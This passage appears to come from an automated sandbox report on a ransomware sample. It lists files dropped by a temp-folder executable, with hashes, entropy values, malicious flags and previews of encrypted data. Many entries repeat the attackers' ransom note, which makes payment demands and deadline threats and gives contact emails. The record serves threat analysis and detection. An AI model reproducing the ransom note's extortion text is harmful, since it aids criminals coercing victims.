                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12912
                                                                                                                                            Entropy (8bit):6.096315107645308
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:RPEWUxl0xIj6331jVZ9qbQbTbvbwboPqgJPfc:SF0J331jVZ9qbQbTbvb4Wv3c
                                                                                                                                            MD5:65ECDB7050EEC24644AA0D03527DC2C9
                                                                                                                                            SHA1:14A0D791CD9611EFE8DE25D5FB4CE3A35BD361F5
                                                                                                                                            SHA-256:2ECC8A571DF8C89931442896048F47B978E7F4BCAB7970A7170D5640417901D3
                                                                                                                                            SHA-512:F5D4404FDFB1CAE76DB1F076C569FB9E86845743C0089EE9184BA44864C77A61CD5336A34561014F230791EF064029CDAA6D23E249EE9A443A04A1D67B5584CD
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.P.;.5&.D.....d..x-...%_!...=./'.`......L..u......p..k6..;o.mP-Q.h9...3.p......../[}.. T.E...w..O..D.{....E!.+|.3..z..A.s....P..1ZAoH...|..a\.....3Bo2.e.;..b=..8|a...{uB..g...w..nu!FPh..Z..oQ.Y.....0v...Km.[....T_...B..-`N....d..y.....d<...Z.n..h.m.!./K..9GQ.t/..r..+.?htP.d.W(....d.3.B.P...vo..... .U2........./.v..eV..B.\....(..B...5...jN..2..R..,....LD...o9.p&..!......)..t=..u.2.~(...&.v.....tI:e\.....4..VfD.1..75.L.%........!k....B.I......k.r.R..|l~.2..m.|..H=-.k...@...xr<V....e.o...#*_,..T.5.8Q.s..'...|.E.)...F..........#R......./d.V.K.Fz....p....)....zm..y...7...(....r.G.".k.<.1.h.k=.G.>...P..#..fK..zV.|..H......R....]..K.N......2..~Zs..U=A...|h....,.........J:.R.-.....s....o....qV...z*......Q>.w.Ks....h.....z......|_=h.T.[..7.'..VE.0@z.f.6.)4*.t2.c(.%...6?R.~...q.7-.y..+3.....A=....(..............Zb./,.z&..%t\...,j...>wa.:...d.NF].......g..... ...4..k.....#x].H...x..../..]...%w6qD..v..`..o.........7...1..\...6..c.Y..Xt....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12912
                                                                                                                                            Entropy (8bit):6.096315107645308
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:RPEWUxl0xIj6331jVZ9qbQbTbvbwboPqgJPfc:SF0J331jVZ9qbQbTbvb4Wv3c
                                                                                                                                            MD5:65ECDB7050EEC24644AA0D03527DC2C9
                                                                                                                                            SHA1:14A0D791CD9611EFE8DE25D5FB4CE3A35BD361F5
                                                                                                                                            SHA-256:2ECC8A571DF8C89931442896048F47B978E7F4BCAB7970A7170D5640417901D3
                                                                                                                                            SHA-512:F5D4404FDFB1CAE76DB1F076C569FB9E86845743C0089EE9184BA44864C77A61CD5336A34561014F230791EF064029CDAA6D23E249EE9A443A04A1D67B5584CD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.P.;.5&.D.....d..x-...%_!...=./'.`......L..u......p..k6..;o.mP-Q.h9...3.p......../[}.. T.E...w..O..D.{....E!.+|.3..z..A.s....P..1ZAoH...|..a\.....3Bo2.e.;..b=..8|a...{uB..g...w..nu!FPh..Z..oQ.Y.....0v...Km.[....T_...B..-`N....d..y.....d<...Z.n..h.m.!./K..9GQ.t/..r..+.?htP.d.W(....d.3.B.P...vo..... .U2........./.v..eV..B.\....(..B...5...jN..2..R..,....LD...o9.p&..!......)..t=..u.2.~(...&.v.....tI:e\.....4..VfD.1..75.L.%........!k....B.I......k.r.R..|l~.2..m.|..H=-.k...@...xr<V....e.o...#*_,..T.5.8Q.s..'...|.E.)...F..........#R......./d.V.K.Fz....p....)....zm..y...7...(....r.G.".k.<.1.h.k=.G.>...P..#..fK..zV.|..H......R....]..K.N......2..~Zs..U=A...|h....,.........J:.R.-.....s....o....qV...z*......Q>.w.Ks....h.....z......|_=h.T.[..7.'..VE.0@z.f.6.)4*.t2.c(.%...6?R.~...q.7-.y..+3.....A=....(..............Zb./,.z&..%t\...,j...>wa.:...d.NF].......g..... ...4..k.....#x].H...x..../..]...%w6qD..v..`..o.........7...1..\...6..c.Y..Xt....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):717
                                                                                                                                            Entropy (8bit):7.726453277048255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:iHaZQ5eqtSnwTJ2gAljz4ehu6l4FRnrg8ZM7jlFKt/0wILtwsOFmtUmfd2jbp+hw:HYeXwaH4T6l4/nrg8ZM/c9sCmUoe82
                                                                                                                                            MD5:AEF79B4DA248B49579D1F53211C5ED8B
                                                                                                                                            SHA1:E24B3F4B53C60C95B95A737983603214F9FB376B
                                                                                                                                            SHA-256:7FC04963DCC04BDEBAFD14CA14962AC028DB235A182852758E557C866FEEE700
                                                                                                                                            SHA-512:8E3A53DC845E9848FD232144C38E89AEF12B6984C903998521A08A33ED002002963A9C857BB8E7F5FD37FBF5F785B481A368D030181F180F9626334301BEF988
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:..A.6yG.r=n...K..q,...^.n.\.....M..kH.k....Q.*..^.&..q...... m.{..I.=...:....f....;..i...HV.&.l......*..F..(P*...S}.......].e..{.`.(TDV]6sc..|..........E.d"..+..i...2.Iy.v.F....D.m....>..{.m..o.....|...wL.~y...b......&.#..r....n....-#...A.....]q..^....v...]......@nq.C.|bJp,..M...X1].6K.<..y....\..b..g.:._..lqn..+....G....X..#.x.J..\';*...Z....Qt...l2../1....)>.y...MJ....Is0.;...V..._...9x.]..}..\..s"...:b{|...s}}....f?.y.%6(.sb..x...[U..C:0.F}K*.$...p..Cv.|.'k.Z..X.R..OQNZ./.L.d.x.Vm%|....H....p...E.=.n.N......d...W......K.2H.{.....fq..ki......5.WKW.....|..l...U6zA).F..|.38)!^...c..-.zJ..d.....[.9e_.y*s. ....E..2....Jz&\Xh.T....Y).ndB..N.g.2%Q{?..oQ..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):717
                                                                                                                                            Entropy (8bit):7.726453277048255
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:iHaZQ5eqtSnwTJ2gAljz4ehu6l4FRnrg8ZM7jlFKt/0wILtwsOFmtUmfd2jbp+hw:HYeXwaH4T6l4/nrg8ZM/c9sCmUoe82
                                                                                                                                            MD5:AEF79B4DA248B49579D1F53211C5ED8B
                                                                                                                                            SHA1:E24B3F4B53C60C95B95A737983603214F9FB376B
                                                                                                                                            SHA-256:7FC04963DCC04BDEBAFD14CA14962AC028DB235A182852758E557C866FEEE700
                                                                                                                                            SHA-512:8E3A53DC845E9848FD232144C38E89AEF12B6984C903998521A08A33ED002002963A9C857BB8E7F5FD37FBF5F785B481A368D030181F180F9626334301BEF988
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..A.6yG.r=n...K..q,...^.n.\.....M..kH.k....Q.*..^.&..q...... m.{..I.=...:....f....;..i...HV.&.l......*..F..(P*...S}.......].e..{.`.(TDV]6sc..|..........E.d"..+..i...2.Iy.v.F....D.m....>..{.m..o.....|...wL.~y...b......&.#..r....n....-#...A.....]q..^....v...]......@nq.C.|bJp,..M...X1].6K.<..y....\..b..g.:._..lqn..+....G....X..#.x.J..\';*...Z....Qt...l2../1....)>.y...MJ....Is0.;...V..._...9x.]..}..\..s"...:b{|...s}}....f?.y.%6(.sb..x...[U..C:0.F}K*.$...p..Cv.|.'k.Z..X.R..OQNZ./.L.d.x.Vm%|....H....p...E.=.n.N......d...W......K.2H.{.....fq..ki......5.WKW.....|..l...U6zA).F..|.38)!^...c..-.zJ..d.....[.9e_.y*s. ....E..2....Jz&\Xh.T....Y).ndB..N.g.2%Q{?..oQ..0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):791
                                                                                                                                            Entropy (8bit):7.751346827288105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:eL+o7QfXTMOgNZGtj3+tKMRXsMEQs4IqeQLY:eRQfaiOUMR5JLPE
                                                                                                                                            MD5:D77A181D87A0C3410E21028DF8FB9D62
                                                                                                                                            SHA1:EF15F30BB4E61625A58FA10FE2D39B594295CC98
                                                                                                                                            SHA-256:5C5A2B33EE691ADEA65DBAC660E6CD39036C855E1ECC413ABF03E7B34F79129B
                                                                                                                                            SHA-512:41C9DC47ED9538B3B4C69E081066CFD77396B42C8068FF6266CC06D2721C2A4C5FAFC1C62053162D4DC0959F8CD6453C010402ED382A6C511F1D661F36BF61CF
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.:.n|LCcO.*....{.....P2.....x.{.s.Trw.d. .k....RO.b$.8Z....Q....=.f....r.E5.=_...5.3s.......q......L..."......<R,.....m.r9.'...\#xu.b\...j.<a.*[4eO..,.`..LkNFb.*.n....r.W.Y...^D..dv.vwjEL3.*..j.....P..$.......5..!.Xz.."].......b=wMF_9.f,...Z...M....OE.....(.I..MJ.H.S...'.`..._..0..`...y."..,;..q..&|....I.gHf|.....h.......%.....;..^..u..D....K....I...t.0....ms#....).&c..._..|8.....;.\*?a..r!...N.........H.e5.B.VF@.-A0.....f=.u.J....(..n.V*.A. .D.....<s.....X..+....5.6.5..,.p..].+........lityCache"}}.".....<V[.....9...Y.l.+.%=...E...C.r..sKh@..)...>...t..t...(E....;.W..;.ju..r.B.vB.5..Y..`:.P....s...../..o.............gE...A$..7..Ee...RU........Kq.....n.z.O..p.@]....,...|!...6M..-.....].f...1..k9j..YEg..u.......f(.....F....../T....DX.m.C[.h.z.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):791
                                                                                                                                            Entropy (8bit):7.751346827288105
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:eL+o7QfXTMOgNZGtj3+tKMRXsMEQs4IqeQLY:eRQfaiOUMR5JLPE
                                                                                                                                            MD5:D77A181D87A0C3410E21028DF8FB9D62
                                                                                                                                            SHA1:EF15F30BB4E61625A58FA10FE2D39B594295CC98
                                                                                                                                            SHA-256:5C5A2B33EE691ADEA65DBAC660E6CD39036C855E1ECC413ABF03E7B34F79129B
                                                                                                                                            SHA-512:41C9DC47ED9538B3B4C69E081066CFD77396B42C8068FF6266CC06D2721C2A4C5FAFC1C62053162D4DC0959F8CD6453C010402ED382A6C511F1D661F36BF61CF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.:.n|LCcO.*....{.....P2.....x.{.s.Trw.d. .k....RO.b$.8Z....Q....=.f....r.E5.=_...5.3s.......q......L..."......<R,.....m.r9.'...\#xu.b\...j.<a.*[4eO..,.`..LkNFb.*.n....r.W.Y...^D..dv.vwjEL3.*..j.....P..$.......5..!.Xz.."].......b=wMF_9.f,...Z...M....OE.....(.I..MJ.H.S...'.`..._..0..`...y."..,;..q..&|....I.gHf|.....h.......%.....;..^..u..D....K....I...t.0....ms#....).&c..._..|8.....;.\*?a..r!...N.........H.e5.B.VF@.-A0.....f=.u.J....(..n.V*.A. .D.....<s.....X..+....5.6.5..,.p..].+........lityCache"}}.".....<V[.....9...Y.l.+.%=...E...C.r..sKh@..)...>...t..t...(E....;.W..;.ju..r.B.vB.5..Y..`:.P....s...../..o.............gE...A$..7..Ee...RU........Kq.....n.z.O..p.@]....,...|!...6M..-.....].f...1..k9j..YEg..u.......f(.....F....../T....DX.m.C[.h.z.0xABADCABA
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
                                                                                                                                            SHA-256:0591FEC574BC5494E0E30AE75F90A125AFC50E43161FC2DC38772E3B29788894
                                                                                                                                            SHA-512:B64C9C1A3AEFA68B07DF0EE6AC8640C6CADA35A92F83F13671B15E2CDC989E0F7EC30CF2150EB4D3FE3005E52B9F39CF33B75744DD7FB03F8467492D5E5B77B4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' folder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com....ID :FDC612DBA9A80E5E1A879A7425849CBA600B6AD9824D58BB9D54D8EF5BA8FA6413898ABBAFD4A49243136E4F7C2E4378E91B2AD8E8E815CC2AB4362BDA051521F834A009C4793908AA5C8AD381055F2AAFDB5792B54CB0599BE16709CEC8FCA32736592B7B5833BD309D08D84
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2104
                                                                                                                                            Entropy (8bit):7.90824012306629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:6Xef1CQE+rg/WUlQa5gnkgyZ3PodRWeruHfSjr7t:bYQfUeXk3dPobrVt
                                                                                                                                            MD5:E233C8E47ECF95FD69419336862F2F3A
                                                                                                                                            SHA1:53EEDBF0C4990DDF0E005C063B64C3A2EF59D157
                                                                                                                                            SHA-256:5870549B6F1DF6053B2E4BAA11E5C0906F9F2C2075473B87D5789DDCD3637F51
                                                                                                                                            SHA-512:F7B72B7805DE562B1B628F8AE1E3E01416784DF82AB046ECE0DAEB5AB94D2614DCCBCE2B7E4B64FE06B9173774C52941506A17A6AEE08A34EBD86BE386EC201C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:.}..%.,..e.t.N.v....9.T.../6.?Imp...w..]g........`1..9...Z..]{...%H6.X.'..H}..-sd)..|D....r%eZ6...3.e!:.l.....^..n..*.9..F..K$..>..{...?..Aa.6..3.M....(U....1..<....Vc..:....1...?=f2K..!^...p...d...hRg@.P....X(...........14.M.2.)...%.m.$.k.0..tOT./..BV0@E.F...l.J2....|.(....iu... ..r.a\:mM...V.P.y.S....w7...w......<..=...\....6..q.".RbJF..J.?n........L.3.V.......Q;.&..s|!t..$.W._...l.3.....o)..LC..3..=..P.{.Miv...Y.f....g....!GI..7.*.e4.Y.h....q.#..y.\s...A,=...=9..1F.jSnQsB.9.C.]V...c..c...|.=...r...5..J(.U,...t.._.....oF...q/..d.:..@.{+5....a....ve~3.H..w(.cD|..o/.y.^.b...U.3Xt&?..i....%LD..5..'..^..$".....3c...IN..u.n..C...Y..y...)..'.....H...yCr.4.Oy..1.+.G.y.'...'`e3*...%...?-e.A.O.U.....i.OD..zP...}..o!$O]GO....C...@,!...eU.5.ic4.....[I./.h...rt.;.u.K....W 5..o'. .3&f.%....&......KmcZ=...4.....X.T..&*......Rb....v....M.f%.....v..........(Nt...qV;8...=@(.*.[..^...SM.~.a..!O.....y.ELg..i.-[I...q..T....(.M...1..P..U#...%m..-.4..~.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2104
                                                                                                                                            Entropy (8bit):7.90824012306629
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:6Xef1CQE+rg/WUlQa5gnkgyZ3PodRWeruHfSjr7t:bYQfUeXk3dPobrVt
                                                                                                                                            MD5:E233C8E47ECF95FD69419336862F2F3A
                                                                                                                                            SHA1:53EEDBF0C4990DDF0E005C063B64C3A2EF59D157
                                                                                                                                            SHA-256:5870549B6F1DF6053B2E4BAA11E5C0906F9F2C2075473B87D5789DDCD3637F51
                                                                                                                                            SHA-512:F7B72B7805DE562B1B628F8AE1E3E01416784DF82AB046ECE0DAEB5AB94D2614DCCBCE2B7E4B64FE06B9173774C52941506A17A6AEE08A34EBD86BE386EC201C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.}..%.,..e.t.N.v....9.T.../6.?Imp...w..]g........`1..9...Z..]{...%H6.X.'..H}..-sd)..|D....r%eZ6...3.e!:.l.....^..n..*.9..F..K$..>..{...?..Aa.6..3.M....(U....1..<....Vc..:....1...?=f2K..!^...p...d...hRg@.P....X(...........14.M.2.)...%.m.$.k.0..tOT./..BV0@E.F...l.J2....|.(....iu... ..r.a\:mM...V.P.y.S....w7...w......<..=...\....6..q.".RbJF..J.?n........L.3.V.......Q;.&..s|!t..$.W._...l.3.....o)..LC..3..=..P.{.Miv...Y.f....g....!GI..7.*.e4.Y.h....q.#..y.\s...A,=...=9..1F.jSnQsB.9.C.]V...c..c...|.=...r...5..J(.U,...t.._.....oF...q/..d.:..@.{+5....a....ve~3.H..w(.cD|..o/.y.^.b...U.3Xt&?..i....%LD..5..'..^..$".....3c...IN..u.n..C...Y..y...)..'.....H...yCr.4.Oy..1.+.G.y.'...'`e3*...%...?-e.A.O.U.....i.OD..zP...}..o!$O]GO....C...@,!...eU.5.ic4.....[I./.h...rt.;.u.K....W 5..o'. .3&f.%....&......KmcZ=...4.....X.T..&*......Rb....v....M.f%.....v..........(Nt...qV;8...=@(.*.[..^...SM.~.a..!O.....y.ELg..i.-[I...q..T....(.M...1..P..U#...%m..-.4..~.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3427
                                                                                                                                            Entropy (8bit):7.9448657577724875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:xxSolETxG0/SSkiDYlZwxdolWUjOWasDnEtB:vSoGT00NkkuAdoMUmsYb
                                                                                                                                            MD5:DFF2C1946E2AF1857C5CF22E2EB5A63F
                                                                                                                                            SHA1:578D58B07383BE3E5EEA296391739FAFF35CF51A
                                                                                                                                            SHA-256:AE50487CC1AE246BA1782F8217C8FE7DD00F4E4C9A45A7D38053D9FB2D83AF7B
                                                                                                                                            SHA-512:F1955670FA59905199F11692191491C16BBDC0BF9258DC0BEF149940EE20F6AEA678F24F5145CA5726030D5A5C33E726D88BE287CF26A00F55011C661354799A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:;./7...x...0..#...(..I..;.I\q...`.......s..&..{98.Qz#.d.3D...ZZ..K..t....I1..1.....d........!....O.[.~....h.akv.7.!W...v/~B.L..go.G_.."...?.V.....F.]..l.s...1 ......Y....-WJF......${.[&...T.-.$.t.:>{C.w.[..e.....y..Bz.R.V..~..z.S.FH..(.lT..i.R.z...:.z....H..."....KL.No...'..1){Q....sM..<b.i.Q...).B......&....l....M6....s....2Qh...W...2{.r.M....YX#...b...|7z7.%c...voW..bA.SS...gm\\.*J..3{...O..e....x....m@|.oQ..rFF<,.DoU6=Ol...to?......9..$...B..`e.#..A"-D..%.,Z.*D..m}..K..F....A.\.q2c.UP...N....nG.a...m...(..&.......!...Y'...K.....sT..#J..[...|.Pb...V..p.NF.4..=..V....>.V...-i4.]#o.m..hv7..O...z.Of!qN..`0......._..~.M.P!,c..3.JR........*..muo-.R..!.-.%..."p.}....nl.z-.l{.^g...J..T..].....E^..F..*ZG.........K.T%.>..f*.Ie3...-..R...+e....eN..^.8k........E.:.TA3.n.1|.........I8%o..x....4.o./.:..0.l-.......CG..r....`..._-.....,.D.0h...0.bs.2..|fD.9...'=.<........2....X.*.%..z7...7...........]..pX..H.O..kg..(.o.>......Zr:...?..Q...T..u..t......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3427
                                                                                                                                            Entropy (8bit):7.9448657577724875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:xxSolETxG0/SSkiDYlZwxdolWUjOWasDnEtB:vSoGT00NkkuAdoMUmsYb
                                                                                                                                            MD5:DFF2C1946E2AF1857C5CF22E2EB5A63F
                                                                                                                                            SHA1:578D58B07383BE3E5EEA296391739FAFF35CF51A
                                                                                                                                            SHA-256:AE50487CC1AE246BA1782F8217C8FE7DD00F4E4C9A45A7D38053D9FB2D83AF7B
                                                                                                                                            SHA-512:F1955670FA59905199F11692191491C16BBDC0BF9258DC0BEF149940EE20F6AEA678F24F5145CA5726030D5A5C33E726D88BE287CF26A00F55011C661354799A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:;./7...x...0..#...(..I..;.I\q...`.......s..&..{98.Qz#.d.3D...ZZ..K..t....I1..1.....d........!....O.[.~....h.akv.7.!W...v/~B.L..go.G_.."...?.V.....F.]..l.s...1 ......Y....-WJF......${.[&...T.-.$.t.:>{C.w.[..e.....y..Bz.R.V..~..z.S.FH..(.lT..i.R.z...:.z....H..."....KL.No...'..1){Q....sM..<b.i.Q...).B......&....l....M6....s....2Qh...W...2{.r.M....YX#...b...|7z7.%c...voW..bA.SS...gm\\.*J..3{...O..e....x....m@|.oQ..rFF<,.DoU6=Ol...to?......9..$...B..`e.#..A"-D..%.,Z.*D..m}..K..F....A.\.q2c.UP...N....nG.a...m...(..&.......!...Y'...K.....sT..#J..[...|.Pb...V..p.NF.4..=..V....>.V...-i4.]#o.m..hv7..O...z.Of!qN..`0......._..~.M.P!,c..3.JR........*..muo-.R..!.-.%..."p.}....nl.z-.l{.^g...J..T..].....E^..F..*ZG.........K.T%.>..f*.Ie3...-..R...+e....eN..^.8k........E.:.TA3.n.1|.........I8%o..x....4.o./.:..0.l-.......CG..r....`..._-.....,.D.0h...0.bs.2..|fD.9...'=.<........2....X.*.%..z7...7...........]..pX..H.O..kg..(.o.>......Zr:...?..Q...T..u..t......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4135
                                                                                                                                            Entropy (8bit):4.781048829185184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:cvNlHaKqEi82NdXB8MZL5g9rVy5sWCDB8QYPEAsAQMSoB:Qn6FEUdRL5gu7yYPEAXQMSA
                                                                                                                                            MD5:37C1CB39B868C907797CC2B03262E767
                                                                                                                                            SHA1:FFB306525C3713A453DFE74E3A8461EAFE94FB48
